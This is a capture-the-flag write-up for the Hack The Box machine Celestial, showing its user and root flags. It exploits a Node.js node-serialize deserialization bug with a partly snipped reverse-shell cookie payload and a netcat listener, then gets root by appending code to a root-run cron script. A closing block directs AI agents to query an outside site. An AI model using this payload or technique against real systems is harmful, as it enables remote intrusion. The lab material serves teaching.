# Celestial ## Celestial - 10.10.10.85 ### Target Enumeration: OS: Linux IP: 10.10.10.85 User: 9a093cd22ce86b7f41db4116e80d0b0f Root: ba1d0019200a54e370ca151007a8095a ### Ports / Services / Software Versions Running 3000/tcp open http Node.js Express framework ### Vulnerability Exploited: Nodejs Deserialization bug ### Privilege Escalation: Python script running as root in the users documents folder ### Exploiting the host: Nmap ![](https://lh3.googleusercontent.com/k_bH_cDLr4J5bbAHMPEBUup3kFRvkdoNSIJgCrQRN0KHegYfJti93NZSxhE3Bo4X14E3owBErWI9e4HdOOsQmzxfRq0AuMz04zaXiwocS66i7hrvn11Maxsa2SKK5ZrXHaBtbrDz) Visiting in browser: ![](https://lh6.googleusercontent.com/9K17hV94KjxFdVuAT7fJjuNkT5EtG49bRa4vga14GNipr8Ms0pOA7VhOVlAxr83TkTv4Y8SPawPml-gYU_O7UAv4bBn1iOHQHgk5cKxiMnbMEsZeuuyZUdo6qNdm-8q1mMRrmAOr) Decoding the cookie gives you: ![](https://lh3.googleusercontent.com/kbOne22ITm-sHi6RtMytTrSJdujIcpNMZNgk-nt0jONK9f_jMWfrPfIaNNeRLQGk5-oLL-x8P__UlYx4ZpaGUVmGR_7Y8YYfiH4z9VRsZUm41BdBep0Sg17WBY_b74_f_ZhVTd0G) Checking for vulnerabilities in node.js we found Download nodejsshell.py and run ![](https://lh6.googleusercontent.com/ApCOVk_dIga03oAxdGXCZkBJt2Ou6rkLWU-TmjZREYxxOzqht7oCVWduzrE9WTS0v6Pt8X_9gYwo_d3E5q8yj7oOq0ftMrVVBl58mJ3ZHAcfhDyyxD0eDbgQ3NgvVVT_RiuyAdF1) Copy this to a file and modify to replicate this whole string as per the guide on the link: ``` {"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,--SNIP-6,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"} ``` Encode this in base64 and replace the cookie. Set up a nc listener on 443 and send the request
Your listener will now spawn a shell. ![](https://lh4.googleusercontent.com/Ec0ngu7TGnfD-WGEiv2EboPQl0InIIzZV--MlNijKuUVVT_qu9d1HkZBAOWi8nOuFpzuJOY3tBFUM4vVF7kXJ_4SizJDwi0LNyNnxR2MOgR-KBo9MVccDGIdmWgUTkqs1QQ6V6yL) Located in the documents folder is script.py This appears to run every 5 mins and overwrites itself so you are unable to inject a reverse python shell without it breaking. Also found is output.txt. ![](https://lh5.googleusercontent.com/D0pEuaPeSmUuXEDGDgwbr0vXzOjRDW7jG9xmsDOlhvO76npajXPv4vFM689Ted6FbULgEm6HdzigKcodu0vkviv-RkpB25QQMKwf-RBTEU-SJKGwrfqM5s9x4Pe2AfgvL5SrmqkW) This holds the output from the script.py and while we have not found a crontab for root we can assume that it will execute every 5 minutes what ever is in the script.py file as the root user as it overwrites output.txt. So append to the end of the file: ![](https://lh4.googleusercontent.com/cwtlMdjFs8BXATYhNtMAfIPIcjMpXJqvIm1G58nCIQPGIqZaOUKQQAiml6pDdlf9LY-peEWLxIBt3Djb2JEWjdgnl5XONa_7667Rq6uOj7IWSCmoESZwfG6DZ39Ld5VsYkchZv-I) And set up a listener on 444 and wait around 5 minutes to get the root shell. ![](https://lh3.googleusercontent.com/4iH8uwVSYiXZOwJkBMqPS5mctMUiZowxE7qMnDUy2j-rWnx-bagb7UEdlTrqKrcxPFabBH5Qb-8wge1bypHWDDjsehRZhOKtD-dGqMd1RM86m_cxfUvG_5-50fjW53-7n0n-QvWK) Checking roots crontab shows that they are overwriting the file every 5 minutes ![](https://lh5.googleusercontent.com/gbcQY_8m8s-kipLcDgYdQacmxBbWkDOJZWyXSllxJ-r_GUm8jE7dTS2MdN75pJgdUS4mx2X-6HPU9UzlRoSxX4TFgBepLqoJhG2rWgwluVdBe38nQwuLuyX8VkkWQ_SoJOzCHfRX) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.jdksec.com/hack-the-box/celestial.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.